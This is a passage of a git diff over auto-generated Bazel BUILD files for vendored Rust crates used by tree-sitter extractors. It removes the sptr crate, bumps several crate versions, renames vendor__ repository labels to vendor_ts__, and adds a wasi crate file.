a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel +++ /dev/null @@ -1,86 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "sptr", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "default", - ], - crate_root = "src/lib.rs", - edition = "2018", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=sptr", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - "@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "0.3.2", -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.96.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.98.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.96.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.98.bazel index bb6dc0c98bfc..c241c8b14aac 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.96.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.98.bazel @@ -91,10 +91,10 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "2.0.96", + version = "2.0.98", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__unicode-ident-1.0.14//:unicode_ident", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__unicode-ident-1.0.16//:unicode_ident", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel index 8c2e97f71a09..0f6f912481fb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel @@ -85,8 +85,8 @@ rust_library( }), version = "0.13.1", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel index 40eb0932ca58..a79c49f5eeaf 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel @@ -32,7 +32,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__thiserror-impl-1.0.69//:thiserror_impl", + "@vendor_ts__thiserror-impl-1.0.69//:thiserror_impl", ], rustc_flags = [ "--cap-lints=allow", @@ -85,7 +85,7 @@ rust_library( }), version = "1.0.69", deps = [ - "@vendor__thiserror-1.0.69//:build_script_build", + "@vendor_ts__thiserror-1.0.69//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel index 271f65c25271..cf0239a907b0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "1.0.69", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel index e1c2a444f29c..93e058516c02 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.1.8", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__once_cell-1.20.2//:once_cell", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__once_cell-1.20.3//:once_cell", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel index fd77f693651e..83d1b0f07a4a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel @@ -81,9 +81,9 @@ rust_library( }), version = "0.3.37", deps = [ - "@vendor__deranged-0.3.11//:deranged", - "@vendor__num-conv-0.1.0//:num_conv", - "@vendor__powerfmt-0.2.0//:powerfmt", - "@vendor__time-core-0.1.2//:time_core", + "@vendor_ts__deranged-0.3.11//:deranged", + "@vendor_ts__num-conv-0.1.0//:num_conv", + "@vendor_ts__powerfmt-0.2.0//:powerfmt", + "@vendor_ts__time-core-0.1.2//:time_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel index ef0cfd707390..d35fd00eb5ea 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel @@ -81,7 +81,7 @@ rust_proc_macro( }), version = "0.2.19", deps = [ - "@vendor__num-conv-0.1.0//:num_conv", - "@vendor__time-core-0.1.2//:time_core", + "@vendor_ts__num-conv-0.1.0//:num_conv", + "@vendor_ts__time-core-0.1.2//:time_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.20.bazel similarity index 93% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.19.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.20.bazel index 2b99894b5132..9755bbcbacf0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.20.bazel @@ -84,11 +84,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.8.19", + version = "0.8.20", deps = [ - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_spanned-0.6.8//:serde_spanned", - "@vendor__toml_datetime-0.6.8//:toml_datetime", - "@vendor__toml_edit-0.22.22//:toml_edit", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_spanned-0.6.8//:serde_spanned", + "@vendor_ts__toml_datetime-0.6.8//:toml_datetime", + "@vendor_ts__toml_edit-0.22.24//:toml_edit", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel index e10e9d2c2d9f..2f1b87c6a2ed 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel @@ -84,6 +84,6 @@ rust_library( }), version = "0.6.8", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.22.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.24.bazel similarity index 92% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.22.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.24.bazel index f2ac65f16e1b..6ef0d9a44688 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.22.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.24.bazel @@ -84,12 +84,12 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.22.22", + version = "0.22.24", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_spanned-0.6.8//:serde_spanned", - "@vendor__toml_datetime-0.6.8//:toml_datetime", - "@vendor__winnow-0.6.24//:winnow", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_spanned-0.6.8//:serde_spanned", + "@vendor_ts__toml_datetime-0.6.8//:toml_datetime", + "@vendor_ts__winnow-0.7.3//:winnow", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel index d11310f4dbca..97ea0c0bd807 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel @@ -37,7 +37,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__tracing-attributes-0.1.28//:tracing_attributes", + "@vendor_ts__tracing-attributes-0.1.28//:tracing_attributes", ], rustc_flags = [ "--cap-lints=allow", @@ -90,7 +90,7 @@ rust_library( }), version = "0.1.41", deps = [ - "@vendor__pin-project-lite-0.2.16//:pin_project_lite", - "@vendor__tracing-core-0.1.33//:tracing_core", + "@vendor_ts__pin-project-lite-0.2.16//:pin_project_lite", + "@vendor_ts__tracing-core-0.1.33//:tracing_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel index 237a318293e8..b82896b5d1f0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "0.1.28", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel index 4cd145f54f64..ce9e6c7f4862 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.1.33", deps = [ - "@vendor__once_cell-1.20.2//:once_cell", + "@vendor_ts__once_cell-1.20.3//:once_cell", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel index 978d69bb0ef3..bda5915465ae 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel @@ -85,8 +85,8 @@ rust_library( }), version = "0.2.0", deps = [ - "@vendor__lazy_static-1.5.0//:lazy_static", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__tracing-subscriber-0.3.19//:tracing_subscriber", + "@vendor_ts__lazy_static-1.5.0//:lazy_static", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel index e6fe9ab8320b..da7b8a8bfc07 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel @@ -85,8 +85,8 @@ rust_library( }), version = "0.2.0", deps = [ - "@vendor__log-0.4.22//:log", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__tracing-core-0.1.33//:tracing_core", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__tracing-core-0.1.33//:tracing_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel index 723df60eada8..e017d44b227a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel @@ -99,15 +99,15 @@ rust_library( }), version = "0.3.19", deps = [ - "@vendor__matchers-0.1.0//:matchers", - "@vendor__nu-ansi-term-0.46.0//:nu_ansi_term", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__regex-1.11.1//:regex", - "@vendor__sharded-slab-0.1.7//:sharded_slab", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__thread_local-1.1.8//:thread_local", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__tracing-core-0.1.33//:tracing_core", - "@vendor__tracing-log-0.2.0//:tracing_log", + "@vendor_ts__matchers-0.1.0//:matchers", + "@vendor_ts__nu-ansi-term-0.46.0//:nu_ansi_term", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__regex-1.11.1//:regex", + "@vendor_ts__sharded-slab-0.1.7//:sharded_slab", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__thread_local-1.1.8//:thread_local", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__tracing-core-0.1.33//:tracing_core", + "@vendor_ts__tracing-log-0.2.0//:tracing_log", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel index 4e7cb41b8117..aec9a765ca69 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel @@ -86,11 +86,11 @@ rust_library( }), version = "0.24.6", deps = [ - "@vendor__regex-1.11.1//:regex", - "@vendor__regex-syntax-0.8.5//:regex_syntax", - "@vendor__streaming-iterator-0.1.9//:streaming_iterator", - "@vendor__tree-sitter-0.24.6//:build_script_build", - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__regex-1.11.1//:regex", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__streaming-iterator-0.1.9//:streaming_iterator", + "@vendor_ts__tree-sitter-0.24.6//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", ], ) @@ -147,7 +147,7 @@ cargo_build_script( version = "0.24.6", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel index dd057689059b..e65ebd282658 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.23.2", deps = [ - "@vendor__tree-sitter-embedded-template-0.23.2//:build_script_build", - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-embedded-template-0.23.2//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.23.2", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel index 8110b726022b..a5d58cfff1cd 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.24.8", deps = [ - "@vendor__tree-sitter-json-0.24.8//:build_script_build", - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-json-0.24.8//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.24.8", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel index 981966e42287..404fe701044a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.23.1", deps = [ - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", - "@vendor__tree-sitter-ql-0.23.1//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-ql-0.23.1//:build_script_build", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.23.1", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel index e01e9bb737a3..71a3b2369845 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.23.1", deps = [ - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", - "@vendor__tree-sitter-ruby-0.23.1//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-ruby-0.23.1//:build_script_build", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.23.1", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel index cee5d9b5be6d..df6d10a847af 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel @@ -87,7 +87,7 @@ rust_library( }), version = "0.1.14", deps = [ - "@vendor__serde-1.0.217//:serde", - "@vendor__stable_deref_trait-1.2.0//:stable_deref_trait", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__stable_deref_trait-1.2.0//:stable_deref_trait", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel index 3666af4b65a1..9f9e8eaaf6a4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel @@ -86,7 +86,7 @@ rust_library( }), version = "0.9.10", deps = [ - "@vendor__uncased-0.9.10//:build_script_build", + "@vendor_ts__uncased-0.9.10//:build_script_build", ], ) @@ -142,7 +142,7 @@ cargo_build_script( version = "0.9.10", visibility = ["//visibility:private"], deps = [ - "@vendor__version_check-0.9.5//:version_check", + "@vendor_ts__version_check-0.9.5//:version_check", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.14.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.16.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.14.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.16.bazel index 3caee39efcce..f1e1eea9fb4f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.14.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.16.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.14", + version = "1.0.16", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel index a9cceb25bed8..a8fe7b8a667e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.1.0", deps = [ - "@vendor__valuable-0.1.0//:build_script_build", + "@vendor_ts__valuable-0.1.0//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel index 0cac3017546d..6162d18a3cc4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel @@ -81,16 +81,16 @@ rust_library( }), version = "2.5.0", deps = [ - "@vendor__same-file-1.0.6//:same_file", + "@vendor_ts__same-file-1.0.6//:same_file", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel new file mode 100644 index 000000000000..62578b6a312b --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel @@ -0,0 +1,86 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "wasi", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=wasi", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + 